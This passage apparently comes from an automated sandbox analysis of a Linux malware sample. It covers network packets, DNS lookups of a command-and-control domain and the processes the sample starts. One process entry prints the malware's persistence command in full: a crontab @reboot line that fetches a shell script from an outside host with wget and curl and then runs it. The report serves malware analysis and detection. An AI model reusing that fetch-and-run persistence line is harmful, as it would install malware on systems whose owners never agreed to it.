                                                              Dec 17, 2024 22:29:54.851066113 CET261637992212.64.215.71192.168.2.23
                                                              Dec 17, 2024 22:29:59.988662958 CET515103030192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:30:00.108321905 CET30305151080.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:30:00.108511925 CET515103030192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:30:00.108575106 CET515103030192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:30:00.228154898 CET30305151080.78.26.121192.168.2.23
                                                              Dec 17, 2024 22:30:00.228287935 CET515103030192.168.2.2380.78.26.121
                                                              Dec 17, 2024 22:30:00.347914934 CET30305151080.78.26.121192.168.2.23
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 17, 2024 22:27:56.614592075 CET4895353192.168.2.2370.34.254.19
                                                              Dec 17, 2024 22:27:56.777450085 CET3439153192.168.2.2370.34.254.19
                                                              Dec 17, 2024 22:28:01.622045040 CET4212453192.168.2.23185.181.61.24
                                                              Dec 17, 2024 22:28:01.784147024 CET4430553192.168.2.23185.181.61.24
                                                              Dec 17, 2024 22:28:01.882081985 CET5342124185.181.61.24192.168.2.23
                                                              Dec 17, 2024 22:28:02.040750027 CET5344305185.181.61.24192.168.2.23
                                                              Dec 17, 2024 22:28:17.397998095 CET4843453192.168.2.23168.235.111.72
                                                              Dec 17, 2024 22:28:17.703099966 CET5348434168.235.111.72192.168.2.23
                                                              Dec 17, 2024 22:28:25.141781092 CET4597653192.168.2.23217.160.70.42
                                                              Dec 17, 2024 22:28:25.382231951 CET5345976217.160.70.42192.168.2.23
                                                              Dec 17, 2024 22:28:34.831253052 CET5003553192.168.2.2381.169.136.222
                                                              Dec 17, 2024 22:28:35.070481062 CET535003581.169.136.222192.168.2.23
                                                              Dec 17, 2024 22:29:02.098006010 CET4756053192.168.2.23139.84.165.176
                                                              Dec 17, 2024 22:29:07.104469061 CET4666353192.168.2.2381.169.136.222
                                                              Dec 17, 2024 22:29:07.342550993 CET534666381.169.136.222192.168.2.23
                                                              Dec 17, 2024 22:29:34.380455971 CET4774753192.168.2.2364.176.6.48
                                                              Dec 17, 2024 22:29:39.386538029 CET3728853192.168.2.23217.160.70.42
                                                              Dec 17, 2024 22:29:39.624924898 CET5337288217.160.70.42192.168.2.23
                                                              Dec 17, 2024 22:29:47.041596889 CET5832153192.168.2.2380.152.203.134
                                                              Dec 17, 2024 22:29:52.045921087 CET3869753192.168.2.23194.36.144.87
                                                              Dec 17, 2024 22:29:52.295377970 CET5338697194.36.144.87192.168.2.23
                                                              Dec 17, 2024 22:29:59.735794067 CET3388753192.168.2.23194.36.144.87
                                                              Dec 17, 2024 22:29:59.987078905 CET5333887194.36.144.87192.168.2.23
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Dec 17, 2024 22:27:56.614592075 CET192.168.2.2370.34.254.190x3e7Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:27:56.777450085 CET192.168.2.2370.34.254.190x3e7Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:28:01.622045040 CET192.168.2.23185.181.61.240x4bedStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:28:01.784147024 CET192.168.2.23185.181.61.240x4bedStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:28:17.397998095 CET192.168.2.23168.235.111.720x29d7Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:28:25.141781092 CET192.168.2.23217.160.70.420xef32Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:28:34.831253052 CET192.168.2.2381.169.136.2220x48cdStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:29:02.098006010 CET192.168.2.23139.84.165.1760x9d1cStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:29:07.104469061 CET192.168.2.2381.169.136.2220x6fb8Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:29:34.380455971 CET192.168.2.2364.176.6.480xad60Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:29:39.386538029 CET192.168.2.23217.160.70.420xfa9aStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:29:47.041596889 CET192.168.2.2380.152.203.1340x872fStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:29:52.045921087 CET192.168.2.23194.36.144.870x5a07Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:29:59.735794067 CET192.168.2.23194.36.144.870x761eStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Dec 17, 2024 22:28:01.882081985 CET185.181.61.24192.168.2.230x4bedNo error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:28:01.882081985 CET185.181.61.24192.168.2.230x4bedNo error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:28:02.040750027 CET185.181.61.24192.168.2.230x4bedNo error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:28:02.040750027 CET185.181.61.24192.168.2.230x4bedNo error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:28:17.703099966 CET168.235.111.72192.168.2.230x29d7No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:28:17.703099966 CET168.235.111.72192.168.2.230x29d7No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:28:25.382231951 CET217.160.70.42192.168.2.230xef32No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:28:25.382231951 CET217.160.70.42192.168.2.230xef32No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:28:35.070481062 CET81.169.136.222192.168.2.230x48cdNo error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:28:35.070481062 CET81.169.136.222192.168.2.230x48cdNo error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:29:07.342550993 CET81.169.136.222192.168.2.230x6fb8No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:29:07.342550993 CET81.169.136.222192.168.2.230x6fb8No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:29:39.624924898 CET217.160.70.42192.168.2.230xfa9aNo error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:29:39.624924898 CET217.160.70.42192.168.2.230xfa9aNo error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:29:52.295377970 CET194.36.144.87192.168.2.230x5a07No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:29:52.295377970 CET194.36.144.87192.168.2.230x5a07No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:29:59.987078905 CET194.36.144.87192.168.2.230x761eNo error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                              Dec 17, 2024 22:29:59.987078905 CET194.36.144.87192.168.2.230x761eNo error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false

                                                              System Behavior

                                                              Start time (UTC):21:27:55
                                                              Start date (UTC):17/12/2024
                                                              Path:/tmp/nshkmpsl.elf
                                                              Arguments:/tmp/nshkmpsl.elf
                                                              File size:5773336 bytes
                                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                              Start time (UTC):21:27:56
                                                              Start date (UTC):17/12/2024
                                                              Path:/tmp/nshkmpsl.elf
                                                              Arguments:-
                                                              File size:5773336 bytes
                                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                              Start time (UTC):21:27:56
                                                              Start date (UTC):17/12/2024
                                                              Path:/bin/sh
                                                              Arguments:sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):21:27:56
                                                              Start date (UTC):17/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):21:27:56
                                                              Start date (UTC):17/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):21:27:56
                                                              Start date (UTC):17/12/2024
                                                              Path:/usr/bin/crontab
                                                              Arguments:crontab -l
                                                              File size:43720 bytes
                                                              MD5 hash:66e521d421ac9b407699061bf21806f5

                                                              Start time (UTC):21:27:56
                                                              Start date (UTC):17/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):21:27:56
                                                              Start date (UTC):17/12/2024
                                                              Path:/usr/bin/crontab
                                                              Arguments:crontab -
                                                              File size:43720 bytes
                                                              MD5 hash:66e521d421ac9b407699061bf21806f5

                                                              Start time (UTC):21:27:56
                                                              Start date (UTC):17/12/2024
                                                              Path:/tmp/nshkmpsl.elf
                                                              Arguments:-
                                                              File size:5773336 bytes
                                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                              Start time (UTC):21:27:56
                                                              Start date (UTC):17/12/2024
                                                              Path:/tmp/nshkmpsl.elf
                                                              Arguments:-
                                                              File size:5773336 bytes
                                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                              Start time (UTC):21:27:56
                                                              Start date (UTC):17/12/2024
                                                              Path:/tmp/nshkmpsl.elf
                                                              Arguments:-
                                                              File size:5773336 bytes
                                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9